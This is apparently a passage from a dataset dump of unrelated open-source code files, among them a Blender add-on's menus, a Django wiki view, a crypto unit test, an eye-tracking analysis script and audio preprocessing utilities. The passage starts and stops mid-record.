row.column()\r\n sub_sculpt_texture_tools(col)\r\n\r\n pie.operator(\"object.mode_set\", text=\"Object Mode\", icon=\"OBJECT_DATAMODE\").mode = \"OBJECT\"\r\n\r\n row = pie.row()\r\n sub_sculpt_mask_tools(row)\r\n\r\n pie.separator()\r\n pie.separator()\r\n\r\n sub_brush_symmetry(pie)\r\n\r\n sub_sculpt_texture_tiling(pie)\r\n\r\n\r\ndef edit_tools(pie):\r\n pie.operator(\"object.mode_set\", text=\"Sculpt\", icon=\"SCULPTMODE_HLT\").mode = \"SCULPT\"\r\n pie.operator(\"object.mode_set\", text=\"Object\", icon=\"OBJECT_DATA\").mode = \"OBJECT\"\r\n\r\n\r\ndef sub_sculpt_dyntopo_tools(layout):\r\n col = layout.column()\r\n box = col.box()\r\n box.label(\"Dynamic Topology\")\r\n\r\n dyntopo_on = 
bpy.context.active_object.use_dynamic_topology_sculpting\r\n tool_settings = bpy.context.tool_settings\r\n\r\n box.operator(\"sculpt.dynamic_topology_toggle\", text=\"Toggle Dyntopo OFF\" if dyntopo_on else \"Toggle Dyntopo ON\",\r\n icon=\"MESH_DATA\")\r\n\r\n if dyntopo_on:\r\n detail_type = tool_settings.sculpt.detail_type_method\r\n\r\n col = box.column(align=True)\r\n detail_row = col.row(align=True)\r\n\r\n if detail_type == \"BRUSH\":\r\n detail_row.prop(tool_settings.sculpt, \"detail_percent\")\r\n detail_row.operator(\"sculpt.sample_detail_size\", text=\"\", icon=\"EYEDROPPER\")\r\n\r\n elif detail_type == \"CONSTANT\":\r\n detail_row.prop(tool_settings.sculpt, \"constant_detail_resolution\")\r\n detail_row.operator(\"sculpt.sample_detail_size\", text=\"\", icon=\"EYEDROPPER\")\r\n\r\n elif detail_type == \"RELATIVE\":\r\n detail_row.prop(tool_settings.sculpt, \"detail_size\")\r\n\r\n col.prop(tool_settings.sculpt, \"detail_refine_method\", text=\"\")\r\n col.prop(tool_settings.sculpt, \"detail_type_method\", text=\"\")\r\n col.separator()\r\n col.prop(tool_settings.sculpt, \"use_smooth_shading\")\r\n col.separator()\r\n\r\n col.operator(\"sculpt.optimize\")\r\n if detail_type == \"CONSTANT\":\r\n col.operator(\"sculpt.detail_flood_fill\")\r\n\r\n\r\ndef sub_sculpt_mask_tools(layout):\r\n col = layout.column()\r\n row = col.row()\r\n row.scale_x = 0.9\r\n box = row.box()\r\n\r\n box.label(\"Sculpt Mask Extract\")\r\n box.operator(\"sculptkt.extract\", icon=\"MOD_DISPLACE\")\r\n box.operator(\"sculptkt.mask_split\", icon=\"MOD_DISPLACE\")\r\n\r\n box = row.box()\r\n box.label(\"Deform\")\r\n box.operator(\"sculptkt.mask_deform_add\", icon=\"MOD_LATTICE\")\r\n box.operator(\"sculptkt.mask_deform_remove\", icon=\"MOD_LATTICE\")\r\n\r\n box = row.box()\r\n box.label(\"decimate\")\r\n box.operator(\"sculptkt.decimate\", icon=\"MOD_DECIM\").ratio = bpy.context.scene.decimate_factor\r\n box.prop(bpy.context.scene, \"decimate_factor\")\r\n\r\n row = col.row()\r\n\r\n box = row.box()\r\n box.label(\"Remesh\")\r\n box.operator(\"sculptkt.optimized_remesh\", icon=\"MOD_REMESH\")\r\n\r\n\r\ndef sub_sculpt_brush_tools(layout):\r\n col = layout.column()\r\n box = col.box()\r\n box.label(\"Brush\")\r\n\r\n tool_settings = bpy.context.tool_settings\r\n box.template_ID_preview(tool_settings.sculpt, \"brush\", new=\"brush.add\", cols=5, rows=5)\r\n\r\n\r\ndef sub_sculpt_texture_tools(layout):\r\n col = layout.column()\r\n box = col.box()\r\n box.label(\"Brush Texture\")\r\n\r\n tool_settings = bpy.context.tool_settings\r\n box.template_ID_preview(tool_settings.sculpt.brush, \"texture\", new=\"texture.new\", cols=5, rows=5)\r\n box.prop(tool_settings.sculpt.brush.texture_slot, \"map_mode\")\r\n box.prop(tool_settings.sculpt.brush.texture_slot, \"angle\")\r\n col = box.column(align=True)\r\n col.prop(tool_settings.sculpt.brush.texture_slot, \"use_rake\")\r\n col.prop(tool_settings.sculpt.brush.texture_slot, \"use_random\")\r\n\r\n\r\ndef sub_sculpt_texture_tiling(layout):\r\n box = layout.box()\r\n box.label(\"TextureTilling\")\r\n texture = bpy.context.tool_settings.sculpt.brush.texture_slot\r\n row = box.row()\r\n col = row.column()\r\n col.prop(texture, \"offset\")\r\n col = row.column()\r\n col.prop(texture, \"scale\")\r\n\r\n\r\ndef sub_sculpt_symmetry(layout):\r\n box = layout.box()\r\n box.label(\"Dyntopo Symmetry\")\r\n tool_settings = bpy.context.tool_settings\r\n box.prop(tool_settings.sculpt, \"symmetrize_direction\")\r\n box.operator(\"sculpt.symmetrize\")\r\n\r\n\r\nclass 
FlowTools2(bpy.types.Menu):\r\n bl_idname = \"OBJECT_MT_flow_tools\"\r\n bl_label = \"SculpTKt\"\r\n\r\n def draw(self, context):\r\n layout = self.layout\r\n pie = layout.menu_pie()\r\n\r\n if not context.active_object:\r\n add_tools(pie)\r\n return\r\n\r\n ob_type = context.active_object.type\r\n object_mode = context.active_object.mode == \"OBJECT\"\r\n sculpt_mode = context.active_object.mode == \"SCULPT\"\r\n edit_mode = context.active_object.mode == \"EDIT\"\r\n\r\n if object_mode:\r\n if ob_type != \"ARMATURE\":\r\n object_tools(pie)\r\n\r\n else:\r\n armature_tools(pie)\r\n\r\n elif sculpt_mode:\r\n sculpting_tools(pie)\r\n\r\n elif edit_mode:\r\n edit_tools(pie)\r\n\r\n\r\ndef sub_brush_symmetry(layout):\r\n box = layout.box()\r\n box.label(\"Brush Symmetry\")\r\n tool_settings = bpy.context.tool_settings.sculpt\r\n box.prop(tool_settings, \"use_symmetry_x\")\r\n box.prop(tool_settings, \"use_symmetry_y\")\r\n box.prop(tool_settings, \"use_symmetry_z\")\r\n\r\n\r\nclass Booleans(bpy.types.Menu):\r\n bl_idname = \"OBJECT_MT_booleans\"\r\n bl_label = \"Boolean Operations\"\r\n\r\n def draw(self, context):\r\n layout = self.layout\r\n layout.operator(\"sculptkt.multi_object_boolean\", text=\"Add\", icon=\"MOD_ARRAY\").operation = \"UNION\"\r\n layout.operator(\"sculptkt.multi_object_boolean\", text=\"Sub\", icon=\"MOD_BOOLEAN\").operation = \"DIFFERENCE\"\r\n layout.operator(\"sculptkt.multi_object_boolean\", text=\"Intersect\", icon=\"MOD_MULTIRES\").operation = \"INTERSECT\"\r\n\r\n\r\nclass Slash(bpy.types.Menu):\r\n bl_idname = \"OBJECT_MT_slash\"\r\n bl_label = \"Slash Stroke\"\r\n\r\n def draw(self, context):\r\n layout = self.layout\r\n\r\n slash_operator = layout.operator(\r\n \"sculptkt.slash_bool\", text=\"Draw Slash\", icon=\"SCULPTMODE_HLT\")\r\n\r\n slash_operator.cut_thickness = bpy.context.scene.slash_cut_thickness\r\n slash_operator.boolean_solver = bpy.context.scene.slash_boolean_solver\r\n slash_operator.cut_using_mesh = False\r\n slash_operator.is_ciclic = bpy.context.scene.use_slash_ciclic\r\n slash_operator.delete_small_pieces = bpy.context.scene.delete_slash_smallest_pieces\r\n\r\n slash_operator = layout.operator(\r\n \"sculptkt.slash_bool\", text=\"Mesh Cutter Slash\", icon=\"MESH_DATA\")\r\n\r\n slash_operator.cut_thickness = bpy.context.scene.slash_cut_thickness\r\n slash_operator.boolean_solver = bpy.context.scene.slash_boolean_solver\r\n slash_operator.cut_using_mesh = True\r\n slash_operator.is_ciclic = bpy.context.scene.use_slash_ciclic\r\n\r\n layout.menu(\"VIEW3D_MT_slash_options\", icon=\"MODIFIER\")\r\n\r\n\r\nclass SlashOptions(bpy.types.Menu):\r\n bl_idname = \"VIEW3D_MT_slash_options\"\r\n bl_label = \"Slash Options\"\r\n\r\n def draw(self, context):\r\n layout = self.layout\r\n layout.prop(bpy.context.scene, \"slash_cut_thickness\")\r\n layout.prop(bpy.context.scene, \"use_slash_ciclic\")\r\n layout.prop(bpy.context.scene, \"delete_slash_smallest_pieces\")\r\n layout.prop(bpy.context.scene, \"slash_boolean_solver\", text=\"\")\r\n","repo_name":"jeacom25b/Sculpt-tkt","sub_path":"ui_menus.py","file_name":"ui_menus.py","file_ext":"py","file_size_in_byte":10965,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"3"} +{"seq_id":"37013989076","text":"def area(l, c):\n area = l * c\n print(f'A área de um terreno {l}x{c} é de {area}m²')\n\n\n#Programa Princial\nprint('CONTROLE DE TERRENOS')\nprint('-' * 30)\nl = float(input('LARGURA (m):'))\nc = float(input('COMPRIMENTO (m):'))\narea(l, 
c)\n","repo_name":"maisalobao/Python","sub_path":"pythonProject/desafio096.py","file_name":"desafio096.py","file_ext":"py","file_size_in_byte":243,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"19036670576","text":"import logging\n\nfrom core import AudioPlayer\nfrom tts import TTS\n\nlogging.basicConfig()\nlogger = logging.getLogger(\"kalliope\")\n\n\nclass Voicerss(TTS):\n TTS_LANGUAGES_DEFAULT = 'fr-fr'\n TTS_URL = \"http://www.voicerss.org/controls/speech.ashx\"\n TTS_CONTENT_TYPE = \"audio/mpeg\"\n TTS_TIMEOUT_SEC = 30\n\n def __init__(self):\n TTS.__init__(self)\n\n def say(self, words=None, language=TTS_LANGUAGES_DEFAULT, cache=True):\n self.say_generic(cache, language, words, self.get_audio_voicerss, AudioPlayer.PLAYER_MP3, AudioPlayer.AUDIO_MP3_44100_FREQUENCY)\n\n def get_audio_voicerss(self, **kwargs):\n words = kwargs.get('words', None)\n cache = kwargs.get('cache', None)\n file_path = kwargs.get('file_path', None)\n language = kwargs.get('language', None)\n payload = Voicerss.get_payload(language, words)\n\n return TTS.get_audio(file_path, cache, payload, self.TTS_URL)\n\n @staticmethod\n def get_payload(language, words):\n return {\n \"src\": words,\n \"hl\": language,\n \"c\": \"mp3\"\n }\n","repo_name":"alexena/kalliope","sub_path":"tts/voicerss/voicerss.py","file_name":"voicerss.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"3"} +{"seq_id":"73899063440","text":"# coding: utf-8\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\n# Create your views here.\n\nfrom django.db import models\nfrom wiki.models import NamePart\nfrom wiki.models import Rozdil\nfrom wiki.models import Stats\n\n\ndef index(request):\n foo = []\n for name_part in NamePart.objects.all():\n foo.append({'name_part': name_part,'rozdils': Rozdil.objects.filter(part_of=name_part.pk)})\n\n context = {'foo': foo }\n\n return render(request,'index.html',context)\n\n\ndef all_rozdil(request,is_main):\n foo = []\n for name_part in NamePart.objects.all():\n foo.append({'name_part': name_part,'rozdils': Rozdil.objects.filter(part_of=name_part.pk)})\n stats = Stats.objects.all().filter(main_is_id=is_main)\n rozdil = Rozdil.objects.all()\n title_rozdil = Rozdil.objects.get(pk=is_main)\n context = {'stats':stats,'rozdil': rozdil,'title_rozdil':title_rozdil , 'foo': foo }\n\n return render(request,'stats.html',context)\n\ndef detali(request,id_ekz):\n foo = []\n for name_part in NamePart.objects.all():\n foo.append({'name_part': name_part,'rozdils': Rozdil.objects.filter(part_of=name_part.pk)})\n\n\n# Вивід бокового меню в деталях (потрійне вкладення)\n wiki_tree = []\n for name_part in NamePart.objects.all():\n rozdil_sub_tree = []\n for rozdil in Rozdil.objects.filter(part_of=name_part.pk):\n rozdil_sub_tree.append({\n 'rozdil': rozdil,\n 'stat_list': Stats.objects.filter(main_is=rozdil.pk)})\n\n wiki_tree.append({\n 'name_part': name_part,\n 'rozdil_list': rozdil_sub_tree,\n })\n\n\n details = Stats.objects.get(pk=id_ekz)\n rozdil = Rozdil.objects.all()\n context = {'details':details,'rozdil': rozdil,'foo': foo,'wiki_tree':wiki_tree }\n\n return render(request,'details.html',context)\n","repo_name":"BlastPy/tgv","sub_path":"wiki/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"20387368079","text":"# Licensed under the 
Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\"\"\"\ntest_esek\n----------------------------------\n\nTests for `esek` module.\n\"\"\"\n\nfrom kiteclient.openstack.common.crypto import utils as cryptoutils\nfrom kiteclient.tests import base\nfrom kiteclient.tests.v1 import utils\nfrom kiteclient.v1 import esek\nfrom kiteclient.v1 import key\n\nimport base64\n\nimport six\n\n\nclass TestEsek(base.TestCase):\n\n def setUp(self):\n super(base.TestCase, self).setUp()\n key_ses = utils.DummyKeyResponse(gen=20)\n\n skey_data = \"gTqLlW7x2oyNi3k+9YXTpQ==\"\n self.srckey = key.Key('testkey', skey_data, session=key_ses)\n\n dkey_data = \"uoUUn/+ZL+hNUwJ0cxTScg==\"\n self.dstkey = key.Key('destkey', dkey_data, session=key_ses)\n\n self.skey = \"uZnhYaRtzA7QdnDN1hVSWw==\"\n self.ekey = \"fAlG9eGL44ew6q8uTMMKJw==\"\n\n self.esek_data = (\n \"LZ6WWNvCot49sEhnwn0Is/xGWYGQF72rCw8emEKHGmZpDcSQ4K0c5Ld0+fmR\"\n \"T8PjzozEzWK97gNJQHZWSAh1JhmvMO+bjkUNlEdepOjTXrIW6QxdNvMY+Bkd\"\n \"dDwrkKga4wZnoGgeMgK+B7cdGsQ8yAPE3vDjbpmIOvHjHXniCUs=\")\n\n def _encrypt(self, data):\n crypto = cryptoutils.SymmetricCrypto(enctype='AES',\n hashtype='SHA256')\n enc = crypto.encrypt(base64.b64decode(self.ekey),\n six.b(data), b64encode=True)\n sig = crypto.sign(base64.b64decode(self.skey),\n six.b(data), b64encode=True)\n return enc, sig\n\n def test_integrity(self):\n esek_obj = esek.Esek(self.srckey.key_name,\n self.dstkey,\n self.esek_data)\n b64_sig_key = base64.b64encode(esek_obj.sig_key)\n b64_enc_key = base64.b64encode(esek_obj.enc_key)\n self.assertEqual(six.b(self.skey), b64_sig_key)\n self.assertEqual(six.b(self.ekey), b64_enc_key)\n\n def test_decryption(self):\n esek_obj = esek.Esek(self.srckey.key_name,\n self.dstkey,\n self.esek_data)\n\n message = \"MESSAGE\"\n enc, sig = self._encrypt(message)\n new_message = esek_obj.decrypt(enc, sig)\n self.assertEqual(six.b(message), new_message)\n\n def test_bad_signature_throws(self):\n esek_obj = esek.Esek(self.srckey.key_name,\n self.dstkey,\n self.esek_data)\n message = \"MESSAGE\"\n enc, _ = self._encrypt(message)\n sig = \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=\"\n self.assertRaises(ValueError, esek_obj.decrypt, enc, sig)","repo_name":"jamielennox/python-kiteclient","sub_path":"kiteclient/tests/v1/test_esek.py","file_name":"test_esek.py","file_ext":"py","file_size_in_byte":3094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"7037858491","text":"import os\nimport numpy as np\nimport json\nfrom asc2array import asc2array\nimport glob\n \nfolderName = glob.glob(\"./results/*\")\nfolderName.sort()\n\ndatHash={\"PDR\":[],\n \"PDR_baseline\":[],\n \"gazeX\":[],\n \"gazeY\":[],\n # 'mSaccade':[],\n \"sub\":[],\n \"numOfSwitch\":[],\n \"RT\":[],\n \"Blink\" : [],\n \"Saccade\":[],\n \"rejectFlag\":[],\n \"taskTimeLen\":[],\n \"jitter\":[],\n \"start_end\":[], \n \"data_x\":[],\n \"data_x_queue\":[],\n # \"ampOfSaccade\":[]\n }\n\ncfg={'THRES_DIFF':10,\n 'WID_ANALYSIS':4,\n 'useEye':2,\n 'WID_FILTER':[],\n 'mmFlag':False,\n 
'normFlag':True,\n # 'mmFlag':True,\n # 'normFlag':False,\n 's_trg':[],\n 'visualization':False,\n 'MS':False\n }\n\n\nfor iSub,subName in enumerate(folderName):\n fileName = glob.glob(os.path.join(subName+'/*.asc'))\n \n f = open(os.path.join(str(fileName[0])))\n \n dat=[]\n for line in f.readlines():\n dat.append(line.split())\n \n f.close()\n \n eyeData,events,initialTimeVal,fs = asc2array(dat, cfg)\n \n pupilData = eyeData['pupilData']\n gazeX = eyeData['gazeX']\n gazeY = eyeData['gazeY']\n # mSaccade = eyeData['MS']\n datHash['rejectFlag'].append(eyeData['rejectFlag'])\n \n start_trial = [[int(int(e[0])- initialTimeVal),e[1]] for e in events['MSG'] if e[1] == 'Start_Pesentation']\n end_trial = [[int(int(e[0])- initialTimeVal),e[1]] for e in events['MSG'] if e[1] == 'End_Pesentation']\n\n datHash['start_end'].append([[s[0],e[0]] for s,e in zip(start_trial,end_trial)])\n \n events_queue = [[int(int(e[0])- initialTimeVal),e[1]] for e in events['MSG'] if e[1] == 'task_queue']\n events_response = [[int(int(e[0])- initialTimeVal),e[1]] for e in events['MSG'] if e[1] == '0' or e[1] == '1' or e[1] == '2' or e[1] == '3' or e[1] == '4' or e[1] == '5']\n \n rejectNum_res = []\n rejectNum_queue = []\n for i in np.arange(len(events_queue)-1):\n tmp = []\n for j in np.arange(len(events_response)):\n if events_queue[i] < events_response[j] and events_response[j] < events_queue[i+1]:\n tmp.append(j)\n if len(tmp) > 1:\n for k in np.arange(len(tmp)-1):\n rejectNum_res.append(tmp[k])\n # rejectNum_res.append(tmp[:-1])\n elif len(tmp) == 0:\n rejectNum_queue.append(i)\n \n if events_queue[-1][0] > events_response[-1][0]:\n rejectNum_queue.append(len(events_queue)-1)\n \n events_response = [p for i,p in enumerate(events_response) if not i in rejectNum_res ]\n events_queue = [p for i,p in enumerate(events_queue) if not i in rejectNum_queue ]\n \n \n flg = True\n for iTrial in np.arange(len(events_queue)):\n for st in start_trial:\n if abs(int(events_queue[iTrial][0])-int(st[0])) < 9500:\n datHash[\"taskTimeLen\"].append(int(events_queue[iTrial][0])-int(st[0]))\n flg = False\n if flg:\n datHash[\"taskTimeLen\"].append(int(events_queue[iTrial][0])-int(events_response[iTrial-1][0]))\n else:\n flg = True\n \n \n\n ### for heatmap, blink and saccade\n endISI = [[int(int(e[0])- initialTimeVal),e[1]] for e in events['MSG'] if e[1] == 'ISI']\n event_data = {'EFIX':[],'ESACC':[],'EBLINK':[]}\n mmName = list(event_data.keys())\n for mm in mmName:\n for i in np.arange(len(events_queue)): \n tmp = []\n for e in events[mm]:\n if i == len(events_queue)-1:\n if int(e[1])-initialTimeVal > events_queue[i][0] and int(e[1])-initialTimeVal < endISI[-1][0]:\n if e[0] == 'L':\n e[1] = int(e[1])-initialTimeVal-events_queue[i][0]\n e[2] = int(e[2])-initialTimeVal-events_queue[i][0]\n tmp.append(e)\n else:\n if int(e[1])-initialTimeVal > events_queue[i][0] and int(e[1])-initialTimeVal < events_queue[i+1][0]:\n if e[0] == 'L':\n e[1] = int(e[1])-initialTimeVal-events_queue[i][0]\n e[2] = int(e[2])-initialTimeVal-events_queue[i][0]\n tmp.append(e)\n event_data[mm].append(tmp)\n \n for e in event_data['EBLINK']: \n datHash['Blink'].append([[e_data[1],e_data[2],e_data[3]] for e_data in e])\n for e in event_data['ESACC']: \n datHash['Saccade'].append([[e_data[2],e_data[8]] for e_data in e])\n \n tmp_numOfSwitch = np.array([int(r[1]) for r in events_response])\n timeLen = int(cfg['WID_ANALYSIS']*fs)\n \n for i,r in enumerate(events_queue):\n datHash['PDR'].append(pupilData[r[0]-timeLen:r[0]])\n \n sTime = 4\n eTime = 5\n for i,r in 
enumerate(events_response):\n tmp = pupilData[(r[0]-int(sTime*fs)):(r[0]+int(eTime*fs))]\n tmp_gazeX = gazeX[(r[0]-int(sTime*fs)):(r[0]+int(eTime*fs))]\n tmp_gazeY = gazeY[(r[0]-int(sTime*fs)):(r[0]+int(eTime*fs))]\n # tmp_mSaccade = mSaccade[(r[0]-int(sTime*fs)):(r[0]+int(eTime*fs))]\n \n if len(tmp) == int((sTime+eTime)*fs):\n datHash['PDR_baseline'].append(tmp)\n datHash['gazeX'].append(tmp_gazeX)\n datHash['gazeY'].append(tmp_gazeY)\n # datHash['mSaccade'].append(tmp_mSaccade)\n else:\n datHash['PDR_baseline'].append(np.zeros(int((sTime+eTime)*fs)))\n datHash['gazeX'].append(np.zeros(int((sTime+eTime)*fs)))\n datHash['gazeY'].append(np.zeros(int((sTime+eTime)*fs)))\n # datHash['mSaccade'].append(np.zeros(int((sTime+eTime)*fs)))\n \n for que,res in zip(events_queue,events_response):\n datHash['RT'].append((res[0]-que[0])/fs)\n \n \n ############ # of switch #########################\n datHash['numOfSwitch'] = np.r_[datHash['numOfSwitch'], tmp_numOfSwitch]\n \n datHash['sub'] = np.r_[datHash['sub'],np.ones(len(events_queue))*(iSub+1)]\n \n x = [e[0] for e in events_response]\n datHash[\"data_x\"] = np.r_[datHash[\"data_x\"],x]\n \n x = [e[0] for e in events_queue]\n datHash[\"data_x_queue\"] = np.r_[datHash[\"data_x_queue\"],x]\n # datHash['numOfBlink'] = np.r_[datHash['numOfBlink'], np.array(event_data['numOfEBLINK'])]\n # datHash['numOfSaccade'] = np.r_[datHash['numOfSaccade'], np.array(event_data['numOfESACC'])]\n # datHash['ampOfSaccade'] = np.r_[datHash['ampOfSaccade'], np.array(event_data['ampOfESACC'])]\n\ndatHash['PDR'] = np.array(datHash['PDR']).tolist()\ndatHash['gazeX'] = np.array(datHash['gazeX']).tolist()\ndatHash['gazeY'] = np.array(datHash['gazeY']).tolist()\n\ndatHash['PDR_baseline'] = np.array(datHash['PDR_baseline']).tolist()\n\nmmName = list(datHash.keys())\nfor mm in mmName:\n if not isinstance(datHash[mm],list):\n datHash[mm] = datHash[mm].tolist()\n\nif not cfg['mmFlag'] and not cfg['normFlag']:\n with open(os.path.join(\"./data/data_original_au.json\"),\"w\") as f:\n json.dump(datHash,f)\n\nelif cfg['mmFlag'] and not cfg['normFlag']:\n with open(os.path.join(\"./data/data_original_mm.json\"),\"w\") as f:\n json.dump(datHash,f)\n\nelse:\n with open(os.path.join(\"./data/data_original_norm.json\"),\"w\") as f:\n json.dump(datHash,f)\n","repo_name":"suzuki970/PupilAuditoryStreaming","sub_path":"[Python]PreProcessing/Exp1/parseData.py","file_name":"parseData.py","file_ext":"py","file_size_in_byte":7337,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"20214019099","text":"import argparse\nimport os\nfrom typing import List, Union\n\nimport librosa\nimport soundfile\n\n\ndef resample_wav(\n root: str, ori_data_list: List[str], target_data_path: str, sample_rate: int\n) -> None:\n r\"\"\"Resamples wav files to the target sample rate.\n\n Args:\n root: Path to the root directory of the original .wav data.\n ori_data_list: List of original .wav filenames.\n target_data_path: Target path to save resampled .wav files.\n sample_rate: Target sample rate of the audio.\n \"\"\"\n for ori_wav_name in ori_data_list:\n ori_wav_path = os.path.join(root, ori_wav_name)\n out_path = os.path.join(target_data_path, ori_wav_name)\n ori_wav, _ = librosa.load(ori_wav_path, sr=sample_rate, res_type=\"kaiser_fast\")\n soundfile.write(out_path, ori_wav, samplerate=sample_rate)\n print(\"\\t\", out_path)\n\n\ndef slice_wav_into_segments(\n root: str,\n ori_data_list: List[str],\n target_data_path: str,\n sample_rate: int,\n slice_sec: 
Union[int, float],\n) -> None:\n r\"\"\"Slice raw waveform into segments according to the target slice seconds.\n\n Args:\n root: Path to the root directory of the original .wav data.\n ori_data_list: List of original .wav filenames.\n target_data_path: Target path to save resampled .wav files.\n sample_rate: Target sample rate of the audio.\n slice_sec: Slice original wav files into segments of this duration. (in seconds)\n \"\"\"\n for ori_wav_name in ori_data_list:\n ori_wav_path = os.path.join(root, ori_wav_name)\n ori_wav, _ = librosa.load(ori_wav_path, sr=sample_rate, res_type=\"kaiser_fast\")\n num_segments = ori_wav.shape[0] // (sample_rate * slice_sec)\n for segment_count in range(num_segments):\n start = segment_count * sample_rate * slice_sec\n end = (segment_count + 1) * sample_rate * slice_sec\n wav_chunk = ori_wav[start:end]\n chunk_name = f\"{ori_wav_name.split('.')[0]}_{segment_count}.wav\"\n chunk_path = os.path.join(target_data_path, chunk_name)\n soundfile.write(chunk_path, wav_chunk, samplerate=sample_rate)\n print(\"\\t\", chunk_path)\n\n\ndef slice_wav_into_breathing_cycle(\n root: str,\n ori_data_list: List[str],\n target_data_path: str,\n ann_txt_path: str,\n sample_rate: int,\n) -> None:\n r\"\"\"Slice raw waveform into small chunks according to breathing cycle start-end time and extract crackle and wheeze labels.\n\n Args:\n root: Path to the root directory of the original .wav data.\n ori_data_list: List of original .wav filenames.\n target_data_path: Target path to save resampled .wav files.\n ann_txt_path: Path that contains original .txt annotation files.\n sample_rate: Target sample rate of the audio.\n\n Output:\n Save wav chunk as: `TARGETPATH/OriginalFilename_CycleCount_Crackle_Wheeze.wav`.\n\n For example,\n `226_1b1_Pl_sc_LittC2SE_2_10.wav` represents the second cycle of the original `226_1b1_Pl_sc_LittC2SE.wav`, with crackle = 1, wheeze = 0.\n \"\"\"\n for ori_wav_name in ori_data_list:\n ori_wav_path = os.path.join(root, ori_wav_name)\n ori_wav, _ = librosa.load(ori_wav_path, sr=sample_rate, res_type=\"kaiser_fast\")\n ori_ann = os.path.join(ann_txt_path, ori_wav_name.replace(\"wav\", \"txt\"))\n ann_list = open(ori_ann, \"r\").readlines()\n\n for cycle_count, annotation in enumerate(ann_list):\n marker = annotation.replace(\"\\n\", \"\").split(\"\\t\")\n start = int(float(marker[0]) * sample_rate)\n end = int(float(marker[1]) * sample_rate)\n crackle = int(marker[2])\n wheeze = int(marker[3])\n wav_chunk = ori_wav[start : end + 1]\n chunk_name = f'{ori_wav_name.replace(\".wav\", \"\")}_{cycle_count}_{crackle}{wheeze}.wav'\n chunk_path = os.path.join(target_data_path, chunk_name)\n soundfile.write(chunk_path, wav_chunk, samplerate=sample_rate)\n\n\ndef args_parser() -> argparse.Namespace:\n r\"\"\"Parses command line arguments.\"\"\"\n parser = argparse.ArgumentParser(description=\"Prepare data for training.\")\n parser.add_argument(\n \"--ori_data_path\",\n type=str,\n required=True,\n metavar=\"PATH\",\n help=\"Path that contains original .wav files.\",\n )\n parser.add_argument(\n \"--output_path\",\n type=str,\n required=True,\n metavar=\"PATH\",\n help=\"Target path to save .wav chunks.\",\n )\n parser.add_argument(\n \"--ori_txt_path\",\n type=str,\n default=None,\n metavar=\"PATH\",\n help=\"Path that contains original .txt annotation files. 
Note: can be the same folder as original .wav\",\n )\n parser.add_argument(\n \"--slice\",\n action=\"store_true\",\n help=\"Slice original wav files into chunks\",\n )\n parser.add_argument(\n \"--target-sample-rate\",\n type=int,\n default=16000,\n help=\"Target sample rate of the audio. (default: 16000)\",\n )\n parser.add_argument(\n \"--slice_sec\",\n type=Union[float, int],\n default=8,\n help=\"Slice original wav files into segments of this duration. (in seconds, default: 8)\",\n )\n return parser.parse_args()\n\n\nif __name__ == \"__main__\":\n args = args_parser()\n\n ori_data_list = filter(\n lambda file: file.endswith(\".wav\"), os.listdir(args.ori_data_path)\n )\n\n if not os.path.exists(args.output_path):\n os.makedirs(args.output_path)\n\n if args.slice:\n print(f\"Slice original wav files into chunks...\")\n if args.ori_txt_path is None:\n slice_wav_into_segments(\n root=args.ori_data_path,\n ori_data_list=ori_data_list,\n target_data_path=args.output_path,\n sample_rate=args.target_sample_rate,\n slice_sec=args.slice_sec,\n )\n else:\n slice_wav_into_breathing_cycle(\n root=args.ori_data_path,\n ori_data_list=ori_data_list,\n target_data_path=args.output_path,\n ann_txt_path=args.ori_txt_path,\n sample_rate=args.target_sample_rate,\n )\n else:\n resample_wav(\n root=args.ori_data_path,\n ori_data_list=ori_data_list,\n target_data_path=args.output_path,\n sample_rate=args.target_sample_rate,\n )\n","repo_name":"lunayht/UNOprocess","sub_path":"icbhi_data/prep_data.py","file_name":"prep_data.py","file_ext":"py","file_size_in_byte":6463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"17701620894","text":"# -*- coding: utf-8 -*-\n\"\"\"\n load data from csv file\n\"\"\"\nfrom collections import Counter\nimport numpy as np\n\n\ndef csv_dataloader(input_file):\n \"\"\"\n\n :param input_file:\n :return:\n \"\"\"\n X = []\n y = []\n with open(input_file, 'r') as f_in:\n line = f_in.readline()\n while line:\n if line.startswith('Flow'):\n line = f_in.readline()\n line_arr = line.split(',')\n X.append(line_arr[7:40])\n if line_arr[-1] == '2\\n':\n y.append('1')\n else:\n y.append('0')\n\n line = f_in.readline()\n\n X = np.asarray(X, dtype=float)\n y = np.asarray(y, dtype=int)\n print(Counter(y))\n\n return (X, y)\n","repo_name":"kun0906/one_class_classification_legacy","sub_path":"Utilities/CSV_Dataloader.py","file_name":"CSV_Dataloader.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"38607378221","text":"from ast import pattern\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.ui import WebDriverWait\nimport re\n\n\ndef init_driver():\n # init webdriver firefox\n options = webdriver.FirefoxOptions()\n options.set_preference(\n \"general.useragent.override\",\n \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:86.0) Gecko/20100101 Firefox/86.0\",\n )\n options.set_preference(\"dom.webdriver.enabled\", False)\n options.headless = True\n return webdriver.Firefox(\n executable_path=\"driver/geckodriver\",\n options=options\n )\n\n\ndef init_wait(driver):\n return 